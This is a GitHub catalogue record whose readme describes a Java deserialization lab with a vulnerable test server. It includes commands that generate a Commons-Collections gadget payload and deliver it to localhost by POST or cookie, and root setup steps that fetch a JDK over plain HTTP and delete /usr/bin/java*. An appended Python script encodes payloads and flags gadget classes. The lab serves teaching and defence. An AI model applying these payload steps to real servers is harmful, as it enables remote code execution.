{"id":13363104,"url":"https://github.com/joaomatosf/JavaDeserH2HC","last_synced_at":"2025-03-12T15:31:02.558Z","repository":{"id":87910208,"uuid":"103146553","full_name":"joaomatosf/JavaDeserH2HC","owner":"joaomatosf","description":"Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).","archived":false,"fork":false,"pushed_at":"2022-03-11T17:18:27.000Z","size":966,"stargazers_count":491,"open_issues_count":2,"forks_count":117,"subscribers_count":23,"default_branch":"master","last_synced_at":"2024-11-18T10:36:36.540Z","etag":null,"topics":["deserialization","java","javadeser","jboss","jvm","lab","poc","reverse-shell","vulnerability"],"latest_commit_sha":null,"homepage":null,"language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/joaomatosf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-09-11T14:31:14.000Z","updated_at":"2024-11-01T02:37:42.000Z","dependencies_parsed_at":null,"dependency_job_id":"aa2edbcd-f387-43a2-bd70-b09636086861","html_url":"https://github.com/joaomatosf/JavaDeserH2HC","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/joaomatosf%2FJavaDeserH2HC/manifests","owner_url":"https://r
epos.ecosyste.ms/api/v1/hosts/GitHub/owners/joaomatosf","download_url":"https://codeload.github.com/joaomatosf/JavaDeserH2HC/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242728,"owners_count":20259809,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["deserialization","java","javadeser","jboss","jvm","lab","poc","reverse-shell","vulnerability"],"created_at":"2024-07-29T23:01:15.604Z","updated_at":"2025-03-12T15:31:01.889Z","avatar_url":"https://github.com/joaomatosf.png","language":"Java","funding_links":[],"categories":["Resources"],"sub_categories":["Conferences and Slides"],"readme":"# Lab for Java Deserialization Vulnerabilities\n\nThis content is related to the paper written for the 12th edition of H2HC magazine. \nSee the full paper at: https://www.h2hc.com.br/revista/\n\nSlides and video of the talk will be available soon.\n\n\u003eAn overview of the foundations of native deserialization flaws in Java (JVM) environments\n\n\u003eAn overview of deserialization vulnerabilities in the Java Virtual Machine (JVM)\n\nContent\n--\nThe lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. 
\nThe goal is to provide a better understanding so that you can develop new payloads and/or better design your environments.\n\nThere is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.\n\nSlides\n--\n\n[![Alt text](https://image.slidesharecdn.com/h2hc2017joaomatosfjavadeser-171025200215/95/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017-1-638.jpg?cb=1508963584)](https://www.slideshare.net/joaomatosf_/an-overview-of-deserialization-vulnerabilities-in-the-java-virtual-machine-jvm-h2hc-2017)\n\n\nExamples (PoCs)\n------\n\n* PoC CVE-2017-7504 - JBossMQ JMS Invocation Layer (https://access.redhat.com/security/cve/cve-2017-7504)\n\n[![Alt text](https://img.youtube.com/vi/jVMr4eeJ2Po/0.jpg)](https://www.youtube.com/watch?v=jVMr4eeJ2Po)\n\n* PoC CVE-2017-12149 - JBoss 6.X and EAP 5.X (https://access.redhat.com/security/cve/cve-2017-12149)\n\n[![Alt text](https://img.youtube.com/vi/JIWMItSA8l0/0.jpg)](https://www.youtube.com/watch?v=JIWMItSA8l0)\n\n* PoC Exploiting struts2-rest XStream Deserialization with Reverse Shell\n\n[![Alt text](https://img.youtube.com/vi/IrZOlqio0nw/0.jpg)](https://www.youtube.com/watch?v=IrZOlqio0nw)\n\n\nLab Usage Examples\n--\nFirst of all, read the full paper. 
Then review the sample code and use the vulnerable testing application to understand how the payloads work.\n\n***Getting JDK***\n\nIf you don't want to go to the Oracle page and register, you can download the JDK directly from me at: http://www.joaomatosf.com/rnp/?prefix=rnp/java_files/\n\nThe archive is served over plain HTTP and the commands below replace any system-wide java binaries in /usr/bin, so run them on a disposable lab machine. As **root**, run:\n```\n# cd /opt\n# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz \n# tar zxvf jdk-8u20-linux-x64.tar.gz\n# rm -rf /usr/bin/java*\n# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin\n# java -version\n  java version \"1.8.0_20\" \n```\n\n\n***Getting the code:***\n\n```\n$ git clone https://github.com/joaomatosf/JavaDeserH2HC.git\n$ cd JavaDeserH2HC\n```\n\n***Compiling and running the vulnerable web application:***\n\n```\n$ javac VulnerableHTTPServer.java -XDignore.symbol.file\n$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer\n```\n\n\n```\n* =============================================================== *\n*    Simple Java HTTP Server for Deserialization Lab v0.01        *\n*    https://github.com/joaomatosf/JavaDeserH2HC                  *\n* =============================================================== *\nYou can inject java serialized objects in the following formats:\n\n 1) Binary in HTTP POST (ie \\xAC\\xED). Ex:\n   $ curl 127.0.0.1:8000 --data-binary @ObjectFile.ser\n\n 2) Base64 or Gzip+Base64 via HTTP POST parameters. Ex:\n   $ curl 127.0.0.1:8000 -d \"ViewState=H4sICAeH...\"\n   $ curl 127.0.0.1:8000 -d \"ViewState=rO0ABXNy...\"\n\n 3) Base64 or Gzip+Base64 in cookies. Ex:\n   $ curl 127.0.0.1:8000 -H \"Cookie: JSESSIONID=H4sICAeH...\"\n   $ curl 127.0.0.1:8000 -H \"Cookie: JSESSIONID=rO0ABXNy...\"\n   \n 4) Base64 of AES-CBC encrypted with hardcoded Apache Shiro key. Ex:\n   $ curl 127.0.0.1:8000 -H \"Cookie: rememberMe=MTIzNDU2Nzg...\n   \n 5) XML for XStream RCE vulnerability/serialization. 
Ex:\n   $ curl 127.0.0.1:8000 -d @file.xml\n   \nOBS: To test gadgets in specific libraries, run with -cp param. Ex:\n$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer\n==================================================================\n\nJRE Version: 1.8.0_77\n[INFO]: Listening on port 8000\n```\n\n***Testing payloads***\n\nCompiling ExampleCommonsCollections1, which works against applications with commons-collections 3.2.1 on the classpath and a JRE older than 8u72 (8u72 changed AnnotationInvocationHandler, the entry point this chain relies on):\n\n```\n$ javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java\n```\n\nGenerating the payload:\n\n```\n$ java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 'touch /tmp/h2hc_2017'\nSaving serialized object in ExampleCommonsCollections1.ser\n```\n\nExploiting the vulnerable server:\n\nSending the payload in binary format via HTTP POST:\n```\n$ rm -rf /tmp/h2hc_2017\n$ curl 127.0.0.1:8000/ --data-binary @ExampleCommonsCollections1.ser\nData deserialized!\n$ ls -all /tmp/h2hc_2017\n-rw-r--r-- 1 joao joao 0 Sep 13 22:34 /tmp/h2hc_2017\n```\n\nSending the payload in Gzip+Base64 format in an HTTP cookie (paste the base64 output into the cookie value):\n```\n$ rm -rf /tmp/h2hc_2017\n$ gzip ExampleCommonsCollections1.ser\n$ base64 -w0 ExampleCommonsCollections1.ser.gz\n$ curl 127.0.0.1:8000/ -H \"cookie: JSESSIONID=...\"\nData deserialized!\n$ ls -all /tmp/h2hc_2017\n-rw-r--r-- 1 joao joao 0 Sep 13 22:47 /tmp/h2hc_2017\n```\n\nUpdate 2022 - Pre-Auth RCE (default installation) in JBoss EAP 5.X / AS 6.X, JBoss Operations Network and other Red Hat products\n--\nI've been using these bugs for years in internal engagements. 
Old but still gold for lateral movement inside business/core networks.\nI had already disclosed this at AlligatorCon Recife (I think in 2018) and in the 2019 Hackers to Hackers Conference (H2HC) Advanced Web Training (with my friends @reefbr and @marcioalm).\n\n***Slides***\n\n[![Alt text](https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.png)](https://s3.amazonaws.com/files.joaomatosf.com/slides/alligator_slides.pdf)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fjoaomatosf%2FJavaDeserH2HC/lists"}
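The lab server above accepts the same serialized object in three wrappings (raw `\xAC\xED` bytes, Base64, and Gzip+Base64 in a POST parameter or cookie), and the "Testing payloads" walkthrough builds the cookie form by hand with `gzip` and `base64 -w0`. The following Python script is an added example, not code from JavaDeserH2HC: it produces those three wire forms from a `.ser` blob, and in the other direction does what a defender would do with a captured request, unwrapping each encoding, checking for the Java serialization magic, and pulling class names out of the stream's class descriptors so that known Commons-Collections gadget classes can be flagged. The embedded stream is constructed by hand (one object whose descriptor names `InvokerTransformer`); it is a stand-in for `ExampleCommonsCollections1.ser`, not a working gadget chain, and the gadget-class list is an illustrative assumption to extend for other libraries.

```python
"""Encode/decode helpers for the object formats the lab server accepts.

Added example; not part of JavaDeserH2HC. sample_stream() is constructed
by hand so the script runs offline.
"""
import base64
import binascii
import gzip
import re

JAVA_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
TC_OBJECT = 0x73                   # 's'
TC_CLASSDESC = 0x72                # 'r': start of a class descriptor

# Classes used by the Commons-Collections chains (assumed, illustrative list).
GADGET_CLASSES = {
    "org.apache.commons.collections.functors.InvokerTransformer",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.map.LazyMap",
    "sun.reflect.annotation.AnnotationInvocationHandler",
}


def encode_payload(raw: bytes, mode: str) -> bytes:
    """Wire form for one lab input format: 'binary' (--data-binary),
    'base64' or 'gzip+base64' (POST parameter or cookie value)."""
    if mode == "binary":
        return raw
    if mode == "base64":
        return base64.b64encode(raw)
    if mode == "gzip+base64":
        return base64.b64encode(gzip.compress(raw))
    raise ValueError(f"unknown mode {mode!r}")


def decode_candidate(blob: bytes):
    """Undo the encodings the lab accepts; return (mode, stream) when the
    result starts with the Java serialization magic, else None."""
    if blob.startswith(JAVA_MAGIC):
        return "binary", blob
    try:
        decoded = base64.b64decode(blob, validate=True)
    except (ValueError, binascii.Error):
        return None
    if decoded.startswith(JAVA_MAGIC):
        return "base64", decoded
    if decoded[:2] == b"\x1f\x8b":           # gzip member header ("H4sI" in base64)
        try:
            inflated = gzip.decompress(decoded)
        except (OSError, EOFError):
            return None
        if inflated.startswith(JAVA_MAGIC):
            return "gzip+base64", inflated
    return None


def class_names(stream: bytes) -> list:
    """Heuristic scan (not a full stream parser): TC_CLASSDESC followed by a
    2-byte length and a printable class name counts as a descriptor."""
    names = []
    i = len(JAVA_MAGIC)
    while i < len(stream) - 3:
        if stream[i] == TC_CLASSDESC:
            n = int.from_bytes(stream[i + 1:i + 3], "big")
            name = stream[i + 3:i + 3 + n]
            if len(name) == n and re.fullmatch(rb"[A-Za-z0-9_$.\[;]+", name):
                names.append(name.decode())
                i += 3 + n
                continue
        i += 1
    return names


def assess(blob: bytes) -> dict:
    """Classify a request body or cookie value the way an IDS/WAF rule might."""
    found = decode_candidate(blob)
    if found is None:
        return {"java_stream": False, "mode": None, "classes": [], "gadgets": []}
    mode, stream = found
    classes = class_names(stream)
    return {"java_stream": True, "mode": mode, "classes": classes,
            "gadgets": sorted(set(classes) & GADGET_CLASSES)}


def sample_stream() -> bytes:
    """Constructed stand-in for ExampleCommonsCollections1.ser: magic, TC_OBJECT,
    one descriptor (name, placeholder serialVersionUID, SC_SERIALIZABLE,
    0 fields, TC_ENDBLOCKDATA, TC_NULL superclass). Not a working chain."""
    name = b"org.apache.commons.collections.functors.InvokerTransformer"
    desc = (bytes([TC_CLASSDESC]) + len(name).to_bytes(2, "big") + name
            + b"\x00" * 8 + b"\x02" + b"\x00\x00" + b"\x78\x70")
    return JAVA_MAGIC + bytes([TC_OBJECT]) + desc


if __name__ == "__main__":
    for mode in ("binary", "base64", "gzip+base64"):
        print(mode, assess(encode_payload(sample_stream(), mode)))
```

The Base64 form of the sample starts with `rO0ABXNy` and the Gzip+Base64 form with `H4sI`, the same prefixes the server banner shows, which is also the cheapest indicator to grep for in access logs or a proxy capture.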